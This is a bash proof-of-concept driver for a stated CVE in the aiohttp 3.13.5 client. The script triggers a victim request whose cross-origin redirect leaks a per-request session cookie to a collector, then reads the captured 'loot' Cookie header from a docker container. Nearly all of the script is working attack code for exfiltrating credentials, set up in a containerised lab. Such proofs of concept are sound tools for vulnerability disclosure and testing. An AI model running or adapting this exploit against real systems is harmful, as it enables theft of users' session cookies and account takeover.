#!/usr/bin/env bash
# PoC driver for GHSA-hg6j-4rv6-33pg / CVE-2026-47265.
#
# Drives the victim aiohttp 3.13.5 client to issue its first-hop request with a
# per-request cookie (cookies={"session": <secret>}). The first-hop replies with
# a 302 cross-origin redirect to the collector; the vulnerable client re-attaches
# the per-request cookie to the foreign origin, which records the inbound Cookie
# header. The exploit only fires the trigger and reads the foreign origin's
# record — it never supplies, injects, or echoes the secret itself.
#
# Args:
#   $1  victim trigger URL   (e.g. http://127.0.0.1:9000/trigger)
#   $2  collector container   (e.g. cve-2026-47265-collector)
#   $3  collector loot path    (e.g. /loot/cookie_header.log)
set -euo pipefail

TRIGGER_URL="$1"
COLLECTOR_CONTAINER="$2"
LOOT_PATH="$3"

echo "[*] Triggering victim first-hop request -> cross-origin redirect"
curl -fsS "$TRIGGER_URL"
echo
echo "[*] Trigger returned; reading foreign-origin (collector) Cookie-header record"

# Small settle so the redirected request lands before we read the loot.
sleep 1

echo "=== collector inbound Cookie header(s) (cross-origin observation point) ==="
docker exec "$COLLECTOR_CONTAINER" cat "$LOOT_PATH"
echo "=== end ==="